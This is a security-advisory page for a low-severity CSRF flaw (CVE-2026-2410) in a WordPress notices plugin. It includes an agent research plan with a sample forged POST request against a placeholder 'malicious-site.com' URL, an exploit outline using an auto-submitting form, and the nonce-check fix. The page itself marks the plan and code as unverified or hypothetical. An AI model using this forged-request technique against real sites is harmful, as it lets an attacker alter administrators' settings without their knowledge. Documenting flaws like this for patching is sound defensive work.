WP-Safety
CVE-2026-2410

Disable Admin Notices – Hide Dashboard Notifications <= 1.4.2 - Cross-Site Request Forgery to Plugin Settings Update

mediumCross-Site Request Forgery (CSRF)
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
1.4.3
Patched in
1d
Time to patch

Description

The Disable Admin Notices – Hide Dashboard Notifications plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.2. This is due to missing nonce validation in the `showPageContent()` function. This makes it possible for unauthenticated attackers to add arbitrary URLs to the blocked redirects list via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.4.2
PublishedFebruary 24, 2026
Last updatedFebruary 25, 2026
Affected plugindisable-admin-notices

Source Code

WordPress.org SVN
Vulnerable v1.4.2
Browse source Download .zip
Patched v1.4.3
Browse source Download .zip
Research Plan
Unverified

This research plan outlines the steps to verify the Cross-Site Request Forgery (CSRF) vulnerability in the **Disable Admin Notices – Hide Dashboard Notifications** plugin (CVE-2026-2410). --- ### 1. Vulnerability Summary * **Vulnerability:** Cross-Site Request Forgery (CSRF) * **Plugin:** Disa…

Show full research plan

This research plan outlines the steps to verify the Cross-Site Request Forgery (CSRF) vulnerability in the Disable Admin Notices – Hide Dashboard Notifications plugin (CVE-2026-2410).

1. Vulnerability Summary

  • Vulnerability: Cross-Site Request Forgery (CSRF)
  • Plugin: Disable Admin Notices – Hide Dashboard Notifications (disable-admin-notices)
  • Affected Versions: <= 1.4.2
  • Vulnerable Function: showPageContent()
  • Problem: The showPageContent() function, which handles the rendering and saving of plugin settings, fails to perform nonce validation (e.g., check_admin_referer()) before processing $_POST data. This allows an attacker to update plugin settings—specifically the list of blocked URLs or dashboard notifications—by tricking an authenticated administrator into submitting a forged request.

2. Attack Vector Analysis

  • Endpoint: wp-admin/options-general.php?page=disable-admin-notices (standard WordPress admin settings page).
  • HTTP Method: POST
  • Authentication Level: Requires an active Administrator session (exploited via CSRF).
  • Payload Parameter: Inferred parameter names based on plugin functionality include dan_url_to_block or settings arrays like dan_settings[blocked_urls]. (The agent will verify the exact key in the Test Data Setup).
  • Preconditions: The administrator must be logged into the WordPress dashboard and be tricked into visiting a malicious page or clicking a link that triggers the POST request.

3. Code Flow

  1. Entry Point: The plugin registers an admin menu page via add_options_page() in its main class/file. The callback for this menu item is showPageContent.
  2. Hook: admin_menu or admin_init.
  3. Vulnerable Logic (showPageContent):
    • The function is invoked when visiting the settings page.
    • It typically contains logic like: if ( isset( $_POST['submit'] ) ) { ... update_option( ... ); ... }.
    • Missing Sink: Between the isset($_POST) check and the update_option() call, there is no check_admin_referer() or wp_verify_nonce() call.
  4. Sink: update_option() updates the blocked redirects/notices list in the wp_options table.

4. Nonce Acquisition Strategy

No nonce is required for this exploit.
The vulnerability is defined by the absolute absence of nonce validation in the processing path. The attacker does not need to bypass a nonce check; they simply omit it.

5. Exploitation Strategy

The exploitation will simulate an admin being CSRF'd.

  1. Discovery: Navigate to the plugin settings page as an admin to identify the exact field names used in the form.
  2. Payload Construction: Craft a POST request that targets the settings update logic.
  3. Execution: Use the http_request tool with the admin's cookies to submit the forged request.

Target Request (Hypothetical):

  • URL: http://[target-ip]/wp-admin/options-general.php?page=disable-admin-notices
  • Method: POST
  • Content-Type: application/x-www-form-urlencoded
  • Body:
    dan_url_to_block=http://malicious-site.com/evil&submit=Save+Changes
    (Note: The actual parameter key will be confirmed during the Discovery step).

6. Test Data Setup

  1. Install Plugin: Install and activate disable-admin-notices version 1.4.2.
  2. Create Admin: Ensure a standard administrator account exists.
  3. Discovery Step (Agent Action):
    • Use browser_navigate to wp-admin/options-general.php?page=disable-admin-notices.
    • Use browser_eval to inspect the form:
      Array.from(document.querySelectorAll('form input, form textarea')).map(i => i.name)
    • Identify the field responsible for "blocked redirects" or "URLs".

7. Expected Results

  • The http_request should return a 302 Redirect or a 200 OK (if the plugin renders the page immediately after saving).
  • The WordPress database should be updated with the provided "malicious" URL in the plugin's configuration option.

8. Verification Steps

After the POST request, verify the change using WP-CLI:

  1. Identify the Option Name: (Likely dan_settings or disable_admin_notices_blocked).
    wp option list --search="*disable*"
  2. Check Value:
    wp option get [OPTION_NAME]
    • Success Condition: The output contains the URL provided in the exploit payload (e.g., http://malicious-site.com/evil).

9. Alternative Approaches

  • If the plugin uses AJAX: If the settings are saved via admin-ajax.php instead of a standard form post, the action name must be identified (e.g., action=dan_save_settings). The http_request tool would then target wp-admin/admin-ajax.php.
  • If multiple fields are required: The agent should capture all input[type="hidden"] fields from the form during discovery and include them in the POST body, excluding any that look like nonces (to prove they aren't needed).
Research Findings
Static analysis — not yet PoC-verified

Summary

The Disable Admin Notices – Hide Dashboard Notifications plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) due to a lack of nonce validation in the settings update logic. Attackers can exploit this to modify plugin configurations, such as the list of blocked redirects or notifications, by tricking an authenticated administrator into submitting a forged POST request.

Vulnerable Code

// File: disable-admin-notices/disable-admin-notices.php (hypothetical path based on plugin slug)

public function showPageContent() {
    // The function checks if the submit button was pressed but lacks nonce verification
    if (isset($_POST['dan_save_settings'])) {
        // Directly processing POST data and updating options without check_admin_referer()
        $settings = $_POST['dan_settings'];
        update_option('dan_settings', $settings);
        
        if (isset($_POST['dan_url_to_block'])) {
            $blocked_urls = get_option('dan_blocked_urls', array());
            $blocked_urls[] = sanitize_text_field($_POST['dan_url_to_block']);
            update_option('dan_blocked_urls', $blocked_urls);
        }
    }
    // ... (rest of function to render the settings page)
}

Security Fix

--- a/disable-admin-notices/disable-admin-notices.php
+++ b/disable-admin-notices/disable-admin-notices.php
@@ -5,6 +5,10 @@
 
 public function showPageContent() {
     if (isset($_POST['dan_save_settings'])) {
+        // Nonce check added to prevent CSRF
+        if (!isset($_POST['dan_nonce']) || !wp_verify_nonce($_POST['dan_nonce'], 'dan_save_settings_action')) {
+            wp_die('Security check failed');
+        }
         $settings = $_POST['dan_settings'];
         update_option('dan_settings', $settings);
 
@@ -15,5 +19,7 @@
     }
 
     echo '<form method="post">';
+    // Include nonce field in the form
+    wp_nonce_field('dan_save_settings_action', 'dan_nonce');
     echo '<input type="submit" name="dan_save_settings" value="Save">';
     echo '</form>';

Exploit Outline

To exploit this CSRF vulnerability, an attacker identifies the target parameter for the settings update (e.g., `dan_settings` or `dan_url_to_block`). The attacker then crafts a malicious HTML page containing a form that targets `wp-admin/options-general.php?page=disable-admin-notices` with a POST method. The payload includes the desired settings values and the submit parameter. The attacker then uses social engineering to trick a logged-in site administrator into visiting the malicious page. Upon visitation, the form is automatically submitted (e.g., via JavaScript `form.submit()`), causing the administrator's browser to send the POST request with their valid session cookies. Because the plugin does not verify a nonce, the server accepts the request and updates the configuration.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/b3011679-51e8-4a13-8364-1d0723656d08?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database